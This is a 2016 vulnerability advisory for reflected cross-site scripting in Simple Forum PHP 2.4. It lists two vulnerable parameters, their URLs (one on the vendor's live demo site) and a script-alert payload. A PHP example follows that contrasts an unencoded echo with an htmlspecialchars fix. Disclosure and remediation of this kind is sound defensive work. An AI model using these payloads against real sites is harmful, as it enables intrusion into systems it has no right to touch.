Simple Forum PHP 2.4 Cross Site Scripting
=====================================================
# Simple Forum PHP 2.4 - Reflected XSS
=====================================================
# Vendor Homepage: http://simpleforumphp.com
# Date: 14 Oct 2016
# Demo Link : http://simpleforumphp.com/forum/admin.php
# Version : 2.4
# Platform : WebApp - PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# PoC:

Vulnerable parameter : SysMessage
Method : GET
Payload : <script>alert('Reflected XSS')</script>
Vulnerable Url: http://localhost/forum/preview.php?SysMessage=[payload]

Vulnerable parameter : search
Method : POST
Payload : <script>alert('Reflected XSS')</script>
Vulnerable Url: http://simpleforumphp.com/forum/admin.php
=====================================================
# Discovered By : Ehsan Hosseini
=====================================================
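
Both findings are the same defect: a request value written into the HTML response without encoding. The following is an added example, not Simple Forum PHP's source (which the advisory does not show); `render_unsafe`, `render_safe` and `param` are hypothetical names and the sample requests are constructed. It shows the reflecting pattern beside the encoded form for the `SysMessage` (GET) and `search` (POST) parameters.

```php
<?php
declare(strict_types=1);

// Hypothetical stand-ins for how preview.php (GET SysMessage) and
// admin.php (POST search) might echo request data; the real source
// is not part of the advisory.

// Vulnerable pattern: the request value is concatenated into HTML as-is.
function render_unsafe(string $value): string
{
    return '<div class="sysmsg">' . $value . '</div>';
}

// Hardened pattern: encode for the HTML context at the point of output.
// ENT_QUOTES covers both quote styles, ENT_SUBSTITUTE replaces invalid
// UTF-8 instead of returning an empty string.
function render_safe(string $value): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5;
    return '<div class="sysmsg">' . htmlspecialchars($value, $flags, 'UTF-8') . '</div>';
}

// Read a request parameter as a string only. Array input such as
// SysMessage[]=x is treated as empty so the renderers never receive
// an unexpected type.
function param(array $source, string $name): string
{
    $v = $source[$name] ?? '';
    return is_string($v) ? $v : '';
}

// Constructed sample requests carrying the payload from the advisory.
$payload = "<script>alert('Reflected XSS')</script>";
$get  = ['SysMessage' => $payload];
$post = ['search' => $payload];

foreach ([[$get, 'SysMessage'], [$post, 'search']] as [$src, $name]) {
    $unsafe = render_unsafe(param($src, $name));
    $safe   = render_safe(param($src, $name));
    // Report whether a literal <script> tag survives in each rendering.
    printf(
        "%-10s unsafe has <script>: %s | safe has <script>: %s\n",
        $name,
        strpos($unsafe, '<script>') !== false ? 'yes' : 'no',
        strpos($safe, '<script>') !== false ? 'yes' : 'no'
    );
    echo "  encoded output: {$safe}\n";
}
```

In the application itself, `param` would be called with `$_GET` or `$_POST`, and the encoding applied in every template that prints the value.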